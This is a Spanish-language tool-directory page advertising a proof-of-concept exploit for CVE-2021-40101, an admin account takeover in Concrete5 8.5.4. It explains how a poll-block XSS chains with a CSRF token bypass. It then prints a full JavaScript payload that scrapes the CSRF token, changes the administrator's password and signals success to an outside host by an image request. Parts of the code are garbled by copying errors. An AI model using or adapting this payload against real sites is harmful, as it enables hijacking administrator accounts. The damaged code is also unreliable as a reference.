Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-40101 — Encuesta XSS combinada con CSRF conduce a la toma de control de la cuenta de administrador en Concrete5 8.5.4 | Kitploit
Herramientas/GitHubGitHub/s1lkys/cve-2021-40101
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubs1lkys/cve-2021-40101

CVE-2021-40101

Encuesta XSS combinada con CSRF conduce a la toma de control de la cuenta de administrador en Concrete5 8.5.4

Ver Repositorio
4hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Encuesta XSS combinada con CSRF conduce a la toma de control de cuenta de administrador en Concrete5 8.5.4

Un administrador de Concrete CMS en versiones anteriores a la 9 no tenía que proporcionar su contraseña al cambiar la contraseña de otro usuario.

En combinación con CVE-2021-28145 ("Concrete CMS (anteriormente concrete5) antes de 8.5.5 permite a usuarios autenticados remotos realizar ataques XSS a través de un bloque de encuesta manipulado. Esto requiere al menos privilegios de Editor": la corrección se incluyó en la versión 8.5.5.) es posible que un usuario con pocos privilegios, por ejemplo un desarrollador o un usuario público que pueda crear encuestas, inserte código JavaScript malicioso en la aplicación web. Los resultados de las encuestas pueden ser revisados por un administrador en su interfaz web en Informes > Encuestas. Allí también se ejecuta el código JavaScript malicioso. Concrete5 tiene una protección CSRF que se puede eludir fácilmente robando el token correspondiente de la página antes de ejecutar una solicitud. Como Concrete5 no solicita la contraseña anterior al cambiarla, es posible cambiar la contraseña del administrador con mucha facilidad.

Payload

root@kitploit:~
var ccm_token = ";
var body = ";
var regex = /[0-9]{10}\:[a-f0-9]{32}/g;
var req = new XMLHttpRequest();
var req2 = new XMLHttpRequest(); 
req.open("GET","/concrete5-8.5.4/index.php/dashboard/users/search/view/1", true); 
req.setRequestHeader("X-Requested-With", "XMLHttpRequest");
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req. send(); 

req.onreadystatechange = function () { 
  if (req.readyState == 4 bb req.status == 200) { 
    body = req.responseText; 
    ccm_token = body.match(regex)[3];
   }
  }; 
setTimeout(() => { 
  confirm("Admin Account Takeover through XSS and CSRF Bypass in Concrete5 v.8.5.4 by Silky. CSRF Tok en: "+ccm_token); 
  req2.open("POST","/concrete5-8.5.4/index.php/dashboard/users/search/change_password/1", true);
  req2.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  req2.setRequestHeader('Content-type', eapplication/x-www-form-urlencoded.);
  req2.send("ccm_token="+ccm_token+"&uPassword=Demonstration_by_SilkyEruPasswordConfirm=Demonstration_ by_Silkyt_ccm_consider_request_as_xhr=1"); 

req2.onreadystatechange = function () { 
  if (req2.readyState == 4 bb req2.status == 200) {
    body = req2.responseText;
    if (body.includes("Password updated successfully.")){
      console.log("Password updated successfully.");
      var myImage = new Image(0, 0);
      myImage.src = Ihttp://192.168.56.1:5686/Password_changed_successfullys;
     }
     else{
      console.log("Something went wrong");
     } 
   }
 } 
},2000); 

Puntuaciones CVSS:

  • CVE-2021-40101 - 6.4 media AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
  • CVE-2021-28145 - 5.4 media CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Resultando en una puntuación final de

  • 7.2 alta

Referencias:

  • https://hackerone.com/bugs?report_id=1065577
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40101
  • https://youtu.be/w-B-j4NadDw
  • https://github.com/concrete5/concrete5/pull/9707/commits/f6bb806acfdda22860133b9586df068d4e3909a7
Descargar herramienta